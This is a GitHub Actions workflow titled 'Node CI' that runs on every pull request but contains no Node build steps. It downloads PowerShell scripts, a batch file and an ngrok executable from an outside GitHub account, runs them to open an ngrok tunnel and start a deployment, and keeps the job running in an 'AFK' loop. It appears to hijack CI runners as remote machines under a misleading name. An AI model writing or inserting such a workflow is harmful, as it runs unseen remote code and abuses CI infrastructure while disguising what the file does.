
name: Node CI

on:
  pull_request:
  workflow_dispatch:

jobs:
  build:
    strategy:
      fail-fast: false
      matrix:
        os: [windows-latest]
        node: ['16']
        include:
        - os: windows-latest
          commandPrefix: ''
    runs-on: ${{ matrix.os }}
    steps:
    - name: Import
      run: |
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/loop.ps1 -OutFile loop.ps1
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/req.ps1 -OutFile req.ps1
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/host.ps1 -OutFile host.ps1
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/start.bat -OutFile start.bat
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/ngrok.zip -OutFile ngrok.zip
      Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/ngrok.exe -OutFile ngrok.exe

    - name: Host (ngrok)
      run: ./host.ps1

    - name: Deploy
      run: cmd /c start.bat

    - name: AFK
      run: ./loop.ps1